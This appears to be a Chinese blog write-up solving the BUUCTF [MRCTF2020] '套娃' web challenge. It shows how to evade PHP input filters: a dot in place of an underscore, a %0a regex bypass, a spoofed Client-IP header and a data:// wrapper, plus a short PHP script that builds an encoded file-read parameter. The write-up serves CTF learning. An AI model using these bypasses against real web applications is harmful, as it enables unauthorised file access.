BUUCTF [MRCTF2020]套娃

打开链接,查看源码,如图所示

关于$_SERVER[‘QUERY_STRING’]取值,
例如: http://localhost/aaa/?p=222
$_SERVER[‘QUERY_STRING’] = “p=222”;

substr_count()函数计算子串在字符串中出现的次数
PS:子串区分大小写

上述代码不能出现’_’和’%5f’,可以用‘ ’或‘.’或‘ %5F’绕过

通过get取得的参数b_u_p_t不等于23333但是正则,匹配需要匹配到23333所以这里用%0a(因为正则匹配中’^’和’$’代表的是行的开头和结尾,所以能利用换行绕过)绕过

payload:?b.u.p.t=23333%0a


查看源码

复制注释代码放进控制台

随便POST一个Merak值,回显如下


分析一下代码
1.需要IP地址为127.0.0.1 在header中加client-ip:127.0.0.1
2.file_get_contents用php伪协议绕过

2333=data://text/plain,todat%20is%20a%20happy%20day

3.change函数的作用,传入的参数先进行base64解码,然后将字符转化成ASCII并且+$i*2
反写change函数,exp:

<?php
function change($v){ $re = ''; for($i=0;$i<strlen($v);$i++){ $re .= chr ( ord ($v[$i]) - $i*2 ); } return $re;
}
$a='flag.php';
$c=change($a);
$b=base64_encode($c);
echo $b;
?>

得到ZmpdYSZmXGI=
用burp传入参数得到flag

BUUCTF [MRCTF2020]套娃相关推荐

  1. [MRCTF2020]套娃

    [MRCTF2020]套娃 打开网页,没有发现什么特别的,按F12打开开发者工具,查看源代码,发现注释: <!-- //1st $query = $_SERVER['QUERY_STRING'] ...

  2. 【BUUCTF】[MRCTF2020]套娃

    思考 题目是套娃,感觉应该是一环一环的走下去,每个问题应该不是很难,按着他的提示做吧. 知识点 substr_count(),用空格或者.或者大写的url编码 preg_mach(),%0a绕过 本地 ...

  3. BUUCTF [GXYCTF2019] 禁止套娃

    题目分析 这题对我这个小白来说好难理解,慢慢补坑吧.PHP很多常用的函数都不是很了解,命令执行也是呜呜呜感觉学得还不是很精通. 打开题目,只有如下: 看源码也没有什么东西,常见的信息泄露:robots ...

  4. 套娃成功!在《我的世界》里运行Win95、玩游戏,软件和教程现已公开

    晓查 发自 凹非寺  量子位 报道 | 公众号 QbitAI <我的世界>(MineCraft)真是一款高自由度的神奇游戏,几乎每隔几天都会有大神用它实现一些奇妙的创意. 最近有一个叫uD ...

  5. github访问不了_用ssh套娃翻到大陆公网给校园内网服务器装R包以及使用GitHub

    碎碎念... 某学校的服务器装R包真把我搞吐了! 最近我用的学校某计算服务器平台除了ssh登录,竟然连curl www.baidu.com都给封了,离谱 好,既然你给我留ssh还让我用,那我就用ssh ...

  6. 7.20套娃(tao)

    套娃(tao) input 7 3 9 5 3 7 10 6 5 10 2 6 10 10 4 1 10 5 3 5 3 9 output 0 1 2 sol: 把查询想象成(x1,y1)向(x2,y ...

  7. Tomcat - Tomcat套娃式架构与配置文件的对应关系解读

    文章目录 套娃式架构 套娃架构之配置文件 server.xml 套娃式架构 看看上面的整体架构图 server-service-----connector/container-----engine-- ...

  8. Tomcat - Tomcat的套娃式架构设计初探

    文章目录 Tomcat的主要功能 Tomcat的架构初探 Connector 组件 -Coyote Coyote的组成 Container 组件 -Catalina Catalina 的组成 serv ...

  9. 禁止套娃!Redis官网宕机,返回“连接不上Redis”

    点击上方 好好学java ,选择 星标 公众号 重磅资讯.干货,第一时间送达 今日推荐:Spring Boot + Vue 如此强大?竟然可以开发基于 C/S 架构的应用个人原创+1博客:点击前往,查 ...

最新文章

  1. python 正则表达式 截取特定字符串之后的全部内容
  2. Android Studio安装Genymotion插件
  3. 2019.7.16 网络层协议与应用
  4. 【Ogre-windows】环境配置
  5. Web Service 实现分布式事务
  6. Web框架——Flask系列之自定义过滤器详解(五)
  7. 游走于天才与疯子边缘的创业“鬼才”
  8. Nginx+Tpmcat 负载均衡
  9. 【Flink】Flink 运行 实时修改消费组offset
  10. oracle11g 冷备,oracle11G Windows冷备恢复
  11. linux java 自启动_Linux设置开机启动脚本
  12. 23_使用dtree展示所有分类
  13. mqtt客户端c语言开发
  14. 大数据+人工智能时代,电子招投标更符合未来趋势
  15. 华为HCNA之配置OSPF认证实验
  16. numpy读取txt文件
  17. Linux权限的理解 | 粘滞位 |权限掩码 |文件类型
  18. 一键构建云上高可用蛋白质结构预测平台
  19. 自激多谐振荡电路实验总结,小白电路测试
  20. 通过 debug 检测屏幕颜色显示坏点、低格硬盘等等技巧

热门文章

  1. Python自动化办公:批量将文件按分类保存,文件再多,只需一秒钟解决
  2. 【物联网】WiFi基础知识 (一)【看评论区领取资料】
  3. 在app中启动第三方应用wps注意事项
  4. 小姐姐的长裤换超短裙,这Python操作太骚了!
  5. 【Python】转译日文乱码(txt文件)
  6. 华为与android auto连接方法,Android auto华为版
  7. C语言新手记:图像旋转
  8. Flutter新手引导蒙版(浮层)
  9. 梦幻西游手游服务器维护公告,《梦幻西游》手游2019年2月27日维护公告:梦幻狂欢月来临_ 《梦幻西游》手游官网-人人都玩,无处不在...
  10. NodeJs 项目开发小结